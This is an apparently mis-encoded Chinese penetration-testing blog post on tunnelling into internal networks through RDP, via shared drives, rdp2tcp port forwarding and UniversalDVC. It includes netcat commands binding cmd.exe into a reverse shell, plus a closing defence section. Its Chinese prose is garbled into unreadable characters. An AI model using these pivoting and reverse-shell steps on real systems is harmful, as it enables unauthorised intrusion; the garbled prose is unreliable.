I"™C<h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>æœ€è¿‘ä»@cpl3hçš„åšå®¢ä¸­å­¦åˆ°äº†ä½¿ç”¨è¿œç¨‹æ¡Œé¢åè®®å»ºç«‹é€šé“çš„æ–¹æ³•ã€‚</p>

<p>æœ¬æ–‡å°†å¯¹è¿™ä¸ªæ–¹æ³•è¿›è¡Œæ•´ç†ï¼Œç»“åˆè‡ªå·±çš„ç»éªŒï¼Œæ·»åŠ ä¸ªäººç†è§£ã€‚</p>

<p>å­¦ä¹ åœ°å€ï¼š</p>

<p>https://ijustwannared.team/2019/11/07/c2-over-rdp-virtual-channels/</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>ä½¿ç”¨åœºæ™¯</li>
  <li>ä½¿ç”¨å…±äº«æ–‡ä»¶å»ºç«‹é€šé“</li>
  <li>ä½¿ç”¨rdp2tcpå»ºç«‹é€šé“</li>
  <li>ä½¿ç”¨UniversalDVCå»ºç«‹é€šé“</li>
  <li>åˆ©ç”¨åˆ†æ</li>
  <li>é˜²å¾¡å»ºè®®</li>
</ul>

<h2 id="0x02-ä½¿ç”¨åœºæ™¯">0x02 ä½¿ç”¨åœºæ™¯</h2>
<hr />

<p>ç”±äºé˜²ç«å¢™çš„è®¾ç½®ï¼Œåªèƒ½è¿æ¥ä¸€å°WindowsæœåŠ¡å™¨çš„è¿œç¨‹æ¡Œé¢ï¼Œé‚£ä¹ˆå¦‚ä½•ä»¥è¿™å°WindowsæœåŠ¡å™¨ä¸ºè·³æ¿è¿›å…¥å†…ç½‘</p>

<p>ç®€è¦æè¿°å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-12-5/1-1.png" alt="Alt text" /></p>

<h2 id="0x03-ä½¿ç”¨å…±äº«æ–‡ä»¶å»ºç«‹é€šé“">0x03 ä½¿ç”¨å…±äº«æ–‡ä»¶å»ºç«‹é€šé“</h2>
<hr />

<p>é€šè¿‡è¯»å†™RDP Clientå’ŒRDP Serverä¹‹é—´å…±äº«çš„æ–‡ä»¶ä½œä¸ºæ•°æ®ä¼ è¾“çš„é€šé“</p>

<p>POCï¼š</p>

<p>https://github.com/outflanknl/external_c2</p>

<p>è¿™æ˜¯æ ¹æ®Cobalt Strikeä¸­External C2è§„èŒƒç¼–å†™çš„POC</p>

<h3 id="å®ç°åŸç†">å®ç°åŸç†ï¼š</h3>

<p>å»ºç«‹è¿œç¨‹æ¡Œé¢è¿æ¥æ—¶ï¼ŒRDP Clientå’ŒRDP Serverä¹‹é—´å¯ä»¥åˆ›å»ºå…±äº«æ–‡ä»¶å¤¹ï¼Œé€šè¿‡è¯»å†™å…±äº«æ–‡ä»¶ä½œä¸ºæ•°æ®ä¼ è¾“çš„é€šé“</p>

<h3 id="1windowsç³»ç»Ÿè¿æ¥è¿œç¨‹æ¡Œé¢å¹¶å¼€å¯æ–‡ä»¶å…±äº«">1.Windowsç³»ç»Ÿè¿æ¥è¿œç¨‹æ¡Œé¢å¹¶å¼€å¯æ–‡ä»¶å…±äº«</h3>

<h4 id="1é€šè¿‡é…ç½®mstscexeå¼€å¯æ–‡ä»¶å…±äº«">(1)é€šè¿‡é…ç½®mstsc.exeå¼€å¯æ–‡ä»¶å…±äº«</h4>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-12-5/1-2.png" alt="Alt text" /></p>

<h4 id="2ä½¿ç”¨freerdpå¼€å¯æ–‡ä»¶å…±äº«">(2)ä½¿ç”¨FreeRDPå¼€å¯æ–‡ä»¶å…±äº«</h4>

<p>ä¸‹è½½åœ°å€ï¼š</p>

<p>https://cloudbase.it/freerdp-for-windows-nightly-builds/</p>

<p>å‘½ä»¤å®ä¾‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wfreerdp /v:192.168.112.129:3389 -u:1 -p:Test123! /cert-ignore /drive:share1,c:\
</code></pre></div></div>

<h3 id="2kaliç³»ç»Ÿè¿æ¥è¿œç¨‹æ¡Œé¢å¹¶å¼€å¯æ–‡ä»¶å…±äº«">2.Kaliç³»ç»Ÿè¿æ¥è¿œç¨‹æ¡Œé¢å¹¶å¼€å¯æ–‡ä»¶å…±äº«</h3>

<h4 id="1ä½¿ç”¨xfreerdpå¼€å¯æ–‡ä»¶å…±äº«">(1)ä½¿ç”¨xfreerdpå¼€å¯æ–‡ä»¶å…±äº«</h4>

<p>å°†æœ¬åœ°æ–‡ä»¶å¤¹<code class="language-plaintext highlighter-rouge">/tmp</code>å…±äº«çš„å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xfreerdp /v:192.168.112.129:3389 /u:1 /p:Test123! /cert-ignore /drive:share1,/tmp
</code></pre></div></div>

<h4 id="2ä½¿ç”¨rdesktopå¼€å¯æ–‡ä»¶å…±äº«">(2)ä½¿ç”¨rdesktopå¼€å¯æ–‡ä»¶å…±äº«</h4>

<p>å°†æœ¬åœ°æ–‡ä»¶å¤¹<code class="language-plaintext highlighter-rouge">/tmp</code>å…±äº«çš„å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rdesktop 192.168.112.129 -u1 -pTest123! -r disk:share1=/tmp
</code></pre></div></div>

<p>åœ¨RDP Serverä¸Šï¼Œå¯é€šè¿‡<code class="language-plaintext highlighter-rouge">\\tsclient\</code>è®¿é—®å…±äº«çš„æ–‡ä»¶èµ„æº</p>

<p>é€šè¿‡æ–‡ä»¶è¯»å†™æ¥ä¼ è¾“æ•°æ®çš„å…·ä½“ç»†èŠ‚å¯å‚è€ƒxpnçš„æ–‡ç« ï¼š</p>

<p>https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/</p>

<h2 id="0x04-ä½¿ç”¨rdp2tcpå»ºç«‹é€šé“">0x04 ä½¿ç”¨rdp2tcpå»ºç«‹é€šé“</h2>
<hr />

<p>rdp2tcpä½¿ç”¨RDPè™šæ‹Ÿé€šé“åŠŸèƒ½æ¥å¤ç”¨ç«¯å£</p>

<p>å¯ç”¨çš„åŠŸèƒ½ï¼š</p>

<ul>
  <li>æ­£å‘TCPç«¯å£è½¬å‘</li>
  <li>åå‘TCPç«¯å£è½¬å‘</li>
  <li>å¤„ç†æ ‡å‡†è¾“å…¥/è¾“å‡ºè½¬å‘</li>
  <li>SOCKS5ä»£ç†</li>
</ul>

<p>POCï¼š</p>

<p>https://github.com/V-E-O/rdp2tcp</p>

<p>æµ‹è¯•ç³»ç»Ÿï¼š Kali2 x64</p>

<h3 id="1ä¸‹è½½å¹¶ç¼–è¯‘rdp2tcp">1.ä¸‹è½½å¹¶ç¼–è¯‘rdp2tcp</h3>

<h4 id="1å®‰è£…mingw-w64">(1)å®‰è£…mingw-w64</h4>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apt-get install mingw-w64
</code></pre></div></div>

<h4 id="2ä¸‹è½½rdp2tcp">(2)ä¸‹è½½rdp2tcp</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/V-E-O/rdp2tcp.git
cd rdp2tcp
</code></pre></div></div>

<h4 id="3ä¿®æ”¹é…ç½®æ–‡ä»¶">(3)ä¿®æ”¹é…ç½®æ–‡ä»¶</h4>

<p>rdp2tcpé»˜è®¤ä¸æ”¯æŒç¼–è¯‘64ä½çš„exeï¼Œæ‰€ä»¥è¿™é‡Œéœ€è¦ä¿®æ”¹é…ç½®æ–‡ä»¶ï¼Œå¢åŠ ç¼–è¯‘64ä½exeçš„é…ç½®ä¿¡æ¯</p>

<p>ä¿®æ”¹æ–‡ä»¶<code class="language-plaintext highlighter-rouge">Makefile</code>ï¼Œæ–°çš„å†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>all: client server-mingw64

client: client/rdp2tcp
client/rdp2tcp:
	make -C client

#server-mingw32: server/rdp2tcp.exe
#server/rdp2tcp.exe:
#	make -C server -f Makefile.mingw32

server-mingw64: server/rdp2tcp64.exe
server/rdp2tcp64.exe:
	make -C server -f Makefile.mingw64

clean:
	make -C client clean
#	make -C server -f Makefile.mingw32 clean
	make -C server -f Makefile.mingw64 clean
	make -C tools clean
</code></pre></div></div>

<p><strong>æ³¨ï¼š</strong></p>

<p>å› ä¸ºæˆ‘ä»¬ä½¿ç”¨äº†64ä½çš„æ“ä½œç³»ç»Ÿï¼Œå¹¶ä¸”å®‰è£…äº†64ä½çš„mingwï¼Œæ‰€ä»¥è¿™é‡Œè®¾ç½®ä¸ºç”Ÿæˆ64ä½çš„exe</p>

<p>æ–°å»ºæ–‡ä»¶<code class="language-plaintext highlighter-rouge">/server/Makefile.mingw64</code>ï¼Œå†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>BIN=rdp2tcp64.exe
CC=i686-w64-mingw32-gcc
CFLAGS=-Wall -g \
		 -D_WIN32_WINNT=0x0501 \
		 -I../common

# -D_WIN32_WINNT=0x0501
# -D_WIN32_WINNT=0x0501 -DDEBUG

LDFLAGS=-lwtsapi32 -lws2_32
OBJS=	../common/iobuf.o \
	../common/print.o \
	../common/msgparser.o \
	../common/nethelper.o \
	../common/netaddr.o \
	errors.o aio.o events.o \
	tunnel.o channel.o process.o commands.o main.o

all: clean_common $(BIN)

clean_common:
	$(MAKE) -C ../common clean

$(BIN): $(OBJS)
	$(CC) -o $@ $(OBJS) $(LDFLAGS) 

%.o: %.c
	$(CC) $(CFLAGS) -o $@ -c $&lt;

clean:
	rm -f $(OBJS) $(BIN)
</code></pre></div></div>

<h4 id="4ç¼–è¯‘">(4)ç¼–è¯‘</h4>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make
</code></pre></div></div>

<p>ç”Ÿæˆä»¥ä¸‹æ–‡ä»¶:</p>

<ul>
  <li>/server/rdp2tcp64.exe</li>
  <li>/client/rdp2tcp</li>
</ul>

<h3 id="2å®‰è£…xfreerdp">2.å®‰è£…xfreerdp</h3>

<p>Kaliç³»ç»Ÿé»˜è®¤å®‰è£…çš„xfreerdpä¸æ”¯æŒTCPé‡å®šå‘çš„åŠŸèƒ½</p>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-12-5/2-2.png" alt="Alt text" /></p>

<p>å¦‚æœæ”¯æŒTCPé‡å®šå‘çš„åŠŸèƒ½ï¼Œç¨‹åºå›æ˜¾çš„å†…å®¹å¦‚ä¸‹</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-12-5/2-1.png" alt="Alt text" /></p>

<p>éœ€è¦é‡æ–°ä¸‹è½½ç¼–è¯‘xfreerdpï¼Œè¿™é‡Œæˆ‘ä½¿ç”¨çš„ç‰ˆæœ¬æ˜¯freerdp-nightly</p>

<p>å‚è€ƒé“¾æ¥ï¼š</p>

<p>https://ci.freerdp.com/job/freerdp-nightly-binaries/</p>

<p>è¿™é‡Œæˆ‘ä½¿ç”¨çš„å‘è¡Œç‰ˆä¸ºbionicï¼Œå®Œæ•´çš„å®‰è£…å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo "deb http://pub.freerdp.com/repositories/deb/bionic/ freerdp-nightly main " &gt;&gt;/etc/apt/sources.list
wget -O - http://pub.freerdp.com/repositories/ADD6BF6D97CE5D8D.asc | sudo apt-key add -
apt-get update
apt-get install freerdp-nightly
</code></pre></div></div>

<p>å¯¹åº”çš„å®‰è£…è·¯å¾„ä¸º<code class="language-plaintext highlighter-rouge">/opt/freerdp-nightly</code></p>

<p>å¯åŠ¨æ–°ç‰ˆçš„xfreerdpï¼Œå¯¹åº”çš„è·¯å¾„ä¸º: <code class="language-plaintext highlighter-rouge">/opt/freerdp-nightly/bin/xfreerdp</code></p>

<p>æ–°ç‰ˆçš„xfreerdpæ”¯æŒTCPé‡å®šå‘ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-12-5/2-3.png" alt="Alt text" /></p>

<h3 id="3ä½¿ç”¨xfreerdpè¿æ¥è¿œç¨‹æ¡Œé¢å¹¶å»ºç«‹é€šé“">3.ä½¿ç”¨xfreerdpè¿æ¥è¿œç¨‹æ¡Œé¢å¹¶å»ºç«‹é€šé“</h3>

<p>è¿™é‡Œä»‹ç»æ­£å‘TCPç«¯å£è½¬å‘çš„æ–¹æ³•</p>

<h4 id="1æ‰§è¡Œxfreerdpå¹¶å¼€å¯tcpé‡å®šå‘åŠŸèƒ½">(1)æ‰§è¡Œxfreerdpå¹¶å¼€å¯TCPé‡å®šå‘åŠŸèƒ½</h4>

<p>Kaliç³»ç»Ÿä¸Šæ‰§è¡Œï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/opt/freerdp-nightly/bin/xfreerdp /v:192.168.112.129:3389 /u:1 /p:Test123! /cert-ignore /rdp2tcp:/root/rdp2tcp/client/rdp2tcp
</code></pre></div></div>

<h4 id="2å°†rdp2tcp64exeä¸Šä¼ è‡³rdp-serverå¹¶æ‰§è¡Œä¸éœ€è¦ç®¡ç†å‘˜æƒé™">(2)å°†rdp2tcp64.exeä¸Šä¼ è‡³RDP Serverå¹¶æ‰§è¡Œ(ä¸éœ€è¦ç®¡ç†å‘˜æƒé™)</h4>

<p>æ‰§è¡Œç»“æœå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-12-5/2-4.png" alt="Alt text" /></p>

<h4 id="3åœ¨kaliç³»ç»Ÿä¸Šå¯åŠ¨rdp2tcppy">(3)åœ¨Kaliç³»ç»Ÿä¸Šå¯åŠ¨rdp2tcp.py</h4>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd rdp2tcp/tools
python rdp2tcp.py
</code></pre></div></div>

<p>æ·»åŠ æ­£å‘ç«¯å£è½¬å‘(æœ¬åœ°445-&gt;192.168.112.129:445)çš„å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python rdp2tcp.py add forward 127.0.0.1 445 192.168.112.129 445
</code></pre></div></div>

<p>è¾“å‡ºç»“æœå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-12-5/3-1.png" alt="Alt text" /></p>

<h4 id="4è®¿é—®æœ¬åœ°445ç«¯å£">(4)è®¿é—®æœ¬åœ°445ç«¯å£</h4>

<p>è®¿é—®æœ¬åœ°445ç«¯å£çš„æ•°æ®è¢«è½¬å‘è‡³192.168.112.129çš„445ç«¯å£ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-12-5/3-2.png" alt="Alt text" /></p>

<p>æ­£å‘ç«¯å£è½¬å‘å»ºç«‹æˆåŠŸ</p>

<h2 id="0x05-ä½¿ç”¨universaldvcå»ºç«‹é€šé“">0x05 ä½¿ç”¨UniversalDVCå»ºç«‹é€šé“</h2>
<hr />

<p>UniversalDVCæ˜¯ä»¥æ³¨å†ŒUDVCæ’ä»¶çš„å½¢å¼ï¼Œä½¿ç”¨åŠ¨æ€è™šæ‹Ÿé€šé“å»ºç«‹é€šé“</p>

<p>POCï¼š</p>

<p>https://github.com/earthquake/UniversalDVC</p>

<p>æµ‹è¯•ç³»ç»Ÿï¼š Win7 x64</p>

<h3 id="1å®‰è£…udvcæ’ä»¶">1.å®‰è£…UDVCæ’ä»¶</h3>

<p>ä¸‹è½½ç¼–è¯‘å¥½çš„64ä½æ–‡ä»¶ï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/earthquake/UniversalDVC/files/1880297/UDVC-x64.zip</p>

<p>å°†å…¶ä¸­64ä½çš„dllä¿å­˜åœ¨<code class="language-plaintext highlighter-rouge">%windir%\system32</code>ä¸‹</p>

<p>æ³¨å†Œdllçš„å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>regsvr32.exe UDVC-Plugin.x64.dll
</code></pre></div></div>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-12-5/4-1.png" alt="Alt text" /></p>

<p>UDVCæ’ä»¶æ³¨å†Œåå°†åˆ›å»ºæ³¨å†Œè¡¨é¡¹ç”¨æ¥ä¿å­˜é…ç½®ä¿¡æ¯</p>

<p>é…ç½®æ–‡ä»¶çš„ä½ç½®ï¼š<code class="language-plaintext highlighter-rouge">HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default\AddIns\UDVC-Plugin</code></p>

<p>é»˜è®¤ç›‘å¬çš„ç«¯å£ä¸º31337</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>åœ¨RDP Serverå¯åŠ¨UDVC-Server.exeåï¼ŒUDVCæ’ä»¶æ‰ä¼šå¼€å¯ç›‘å¬ç«¯å£</p>

<h3 id="2å®ç°ç«¯å£è½¬å‘çš„åŠŸèƒ½">2.å®ç°ç«¯å£è½¬å‘çš„åŠŸèƒ½</h3>

<h4 id="1å°†modeè®¾ç½®ä¸ºsocket-server-mode-0---default">(1)å°†Modeè®¾ç½®ä¸º<code class="language-plaintext highlighter-rouge">Socket server mode (0 - default)</code></h4>

<p>ä¿®æ”¹æ³¨å†Œè¡¨çš„cmdå‘½ä»¤ä¸º:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add "hkcu\Software\Microsoft\Terminal Server Client\Default\AddIns\UDVC-Plugin" /v mode /t REG_DWORD /d 0 /f
</code></pre></div></div>

<h4 id="2è®¾ç½®ç›‘å¬ç«¯å£ä¸º1234">(2)è®¾ç½®ç›‘å¬ç«¯å£ä¸º1234</h4>

<p>ä¿®æ”¹æ³¨å†Œè¡¨çš„cmdå‘½ä»¤ä¸º:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add "hkcu\Software\Microsoft\Terminal Server Client\Default\AddIns\UDVC-Plugin" /v port /t REG_SZ /d 1234 /f
</code></pre></div></div>

<h4 id="3å¯åŠ¨è¿œç¨‹æ¡Œé¢å®¢æˆ·ç«¯">(3)å¯åŠ¨è¿œç¨‹æ¡Œé¢å®¢æˆ·ç«¯</h4>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mstsc.exe
</code></pre></div></div>

<p>è¿æ¥è¿œç¨‹æ¡Œé¢</p>

<h4 id="4rdp-serverå¯åŠ¨udvc-serverexe">(4)RDP Serverå¯åŠ¨UDVC-Server.exe</h4>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>UDVC-Server.x64.exe -c -p 80 -i 192.168.112.129 -0
</code></pre></div></div>

<h4 id="5rdp-clientæ‰“å¼€æµè§ˆå™¨å¹¶è®¿é—®http1270011234">(5)RDP Clientæ‰“å¼€æµè§ˆå™¨å¹¶è®¿é—®http://127.0.0.1:1234</h4>

<p>è·å¾—å†…ç½‘192.168.112.129:80çš„æ•°æ®</p>

<p>é€šé“å»ºç«‹å®Œæˆï¼Œç®€è¦æµç¨‹å›¾å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-12-5/4-2.png" alt="Alt text" /></p>

<h3 id="3å®ç°åå¼¹shellçš„åŠŸèƒ½">3.å®ç°åå¼¹shellçš„åŠŸèƒ½</h3>

<p>RDP Serveråå¼¹ä¸€ä¸ªshellè‡³RDP Client</p>

<p>RDP Clientèƒ½å¤Ÿå®æ—¶æ§åˆ¶RDP Serverï¼Œæ‰§è¡Œcmdå‘½ä»¤</p>

<h4 id="1å°†modeè®¾ç½®ä¸ºsocket-client-mode-1">(1)å°†Modeè®¾ç½®ä¸º<code class="language-plaintext highlighter-rouge">Socket client mode (1)</code></h4>

<p>ä¿®æ”¹æ³¨å†Œè¡¨çš„cmdå‘½ä»¤ä¸º:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add "hkcu\Software\Microsoft\Terminal Server Client\Default\AddIns\UDVC-Plugin" /v mode /t REG_DWORD /d 1 /f
</code></pre></div></div>

<h4 id="2è®¾ç½®ç›‘å¬ç«¯å£ä¸º1234-1">(2)è®¾ç½®ç›‘å¬ç«¯å£ä¸º1234</h4>

<p>ä¿®æ”¹æ³¨å†Œè¡¨çš„cmdå‘½ä»¤ä¸º:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add "hkcu\Software\Microsoft\Terminal Server Client\Default\AddIns\UDVC-Plugin" /v port /t REG_SZ /d 1234 /f
</code></pre></div></div>

<h4 id="3å¯åŠ¨è¿œç¨‹æ¡Œé¢å®¢æˆ·ç«¯-1">(3)å¯åŠ¨è¿œç¨‹æ¡Œé¢å®¢æˆ·ç«¯</h4>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mstsc.exe
</code></pre></div></div>

<p>è¿æ¥è¿œç¨‹æ¡Œé¢</p>

<h4 id="4rdp-clientä½¿ç”¨ncç›‘å¬æœ¬åœ°ç«¯å£1234">(4)RDP Clientä½¿ç”¨ncç›‘å¬æœ¬åœ°ç«¯å£1234</h4>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc64.exe -lvp 1234
</code></pre></div></div>

<h4 id="5rdp-serverå¯åŠ¨udvc-serverexe">(5)RDP Serverå¯åŠ¨UDVC-Server.exe</h4>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>UDVC-Server.x64.exe -p 5678 -0
</code></pre></div></div>

<p>æ­¤æ—¶å°†å»ºç«‹ä¸€æ¡åŠ¨æ€è™šæ‹Ÿé€šé“ï¼šRDP Server-&gt;RDP Client:1234</p>

<p>å¹¶ä¸”RDP Serverå¼€å¯ç›‘å¬ç«¯å£5678</p>

<h4 id="6rdp-serverä½¿ç”¨ncè¿æ¥æœ¬åœ°ç«¯å£5678å¹¶æŒ‡å®šé‡å®šå‘çš„ç¨‹åºä¸ºcwindowssystem32cmdexe">(6)RDP Serverä½¿ç”¨ncè¿æ¥æœ¬åœ°ç«¯å£5678å¹¶æŒ‡å®šé‡å®šå‘çš„ç¨‹åºä¸º<code class="language-plaintext highlighter-rouge">c:\windows\system32\cmd.exe</code></h4>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc64.exe 127.0.0.1 5678 -e c:\windows\system32\cmd.exe
</code></pre></div></div>

<p>é€šé“å»ºç«‹å®Œæˆï¼Œç®€è¦æµç¨‹å›¾å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-12-5/4-3.png" alt="Alt text" /></p>

<h2 id="0x06-åˆ©ç”¨åˆ†æ">0x06 åˆ©ç”¨åˆ†æ</h2>
<hr />

<p>å¯¹äºè¿™ä¸‰ç§å»ºç«‹é€šé“çš„æ–¹æ³•(å…±äº«æ–‡ä»¶ã€rdp2tcpå’ŒUniversalDVC)ï¼Œåˆ©ç”¨å‰ææ˜¯å·²ç»è·å¾—äº†è¿æ¥è¿œç¨‹æ¡Œé¢çš„æƒé™</p>

<p>ä¸¥æ ¼åœ°è¯´ï¼Œåˆ©ç”¨è¿™å°è¿œç¨‹æ¡Œé¢æœåŠ¡å™¨ï¼Œå°±å·²ç»èƒ½å¤Ÿå¯¹å†…ç½‘èµ„æºè¿›è¡Œè®¿é—®</p>

<p>ç ”ç©¶è¿™ç§æ–¹æ³•çš„æ„ä¹‰åœ¨äºæŸäº›æƒ…å†µä¸‹è¿œç¨‹æ¡Œé¢æœåŠ¡å™¨æ— æ³•è¿è¡Œæˆ‘ä»¬çš„ç¨‹åº</p>

<p>ä¾‹å¦‚è¿œç¨‹æ¡Œé¢æœåŠ¡å™¨ä¸ºWindowsç³»ç»Ÿï¼Œè€Œæˆ‘ä»¬æƒ³æ‰§è¡Œçš„ç¨‹åºåªæ”¯æŒLinuxï¼Œè¿™å°±é¿å…äº†è€ƒè™‘ç¨‹åºç§»æ¤çš„é—®é¢˜</p>

<h2 id="0x07-é˜²å¾¡å»ºè®®">0x07 é˜²å¾¡å»ºè®®</h2>
<hr />

<p>1.å¤–ç½‘è¿œç¨‹æ¡Œé¢æœåŠ¡å™¨çš„å®‰å…¨</p>

<p>å¦‚æœæ”»å‡»è€…èƒ½å¤Ÿä½¿ç”¨è¿œç¨‹æ¡Œé¢åè®®å»ºç«‹é€šé“ï¼Œä»£è¡¨æ”»å‡»è€…å·²ç»è·å¾—äº†è¿™å°æœåŠ¡å™¨çš„æƒé™ï¼Œæ‰€ä»¥å¯¹äºå¼€æ”¾å¤–ç½‘è®¿é—®çš„è¿œç¨‹æ¡Œé¢æœåŠ¡å™¨ï¼Œä¸ä»…è¦åŠæ—¶æ›´æ–°è¡¥ä¸ï¼Œè¿˜è¦æ³¨æ„é˜²èŒƒå£ä»¤çˆ†ç ´</p>

<p>2.ä½¿ç”¨ç»„ç­–ç•¥ç¦ç”¨é‡å®šå‘çš„è®¾å¤‡</p>

<p>ç»„ç­–ç•¥ä½ç½®ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">Computer Configuration</code>-&gt;<code class="language-plaintext highlighter-rouge">Administrative Templates</code>-&gt;<code class="language-plaintext highlighter-rouge">Windows Components</code>-&gt;<code class="language-plaintext highlighter-rouge">Remote Desktop Services</code>-&gt;<code class="language-plaintext highlighter-rouge">Remote Desktop Session Host</code>-&gt;<code class="language-plaintext highlighter-rouge">Device and Resource Redirection</code></p>

<h2 id="0x08-å°ç»“">0x08 å°ç»“</h2>
<hr />

<p>æœ¬æ–‡å‚è€ƒ@cpl3hçš„æ–‡ç« ï¼Œå¯¹ä½¿ç”¨è¿œç¨‹æ¡Œé¢åè®®å»ºç«‹é€šé“çš„æ–¹æ³•è¿›è¡Œæ•´ç†ï¼Œç»“åˆè‡ªå·±çš„ç»éªŒï¼Œæ·»åŠ ä¸ªäººç†è§£ï¼Œåˆ†æåˆ©ç”¨æ€è·¯ï¼Œæ€»ç»“é˜²å¾¡å»ºè®®ã€‚</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET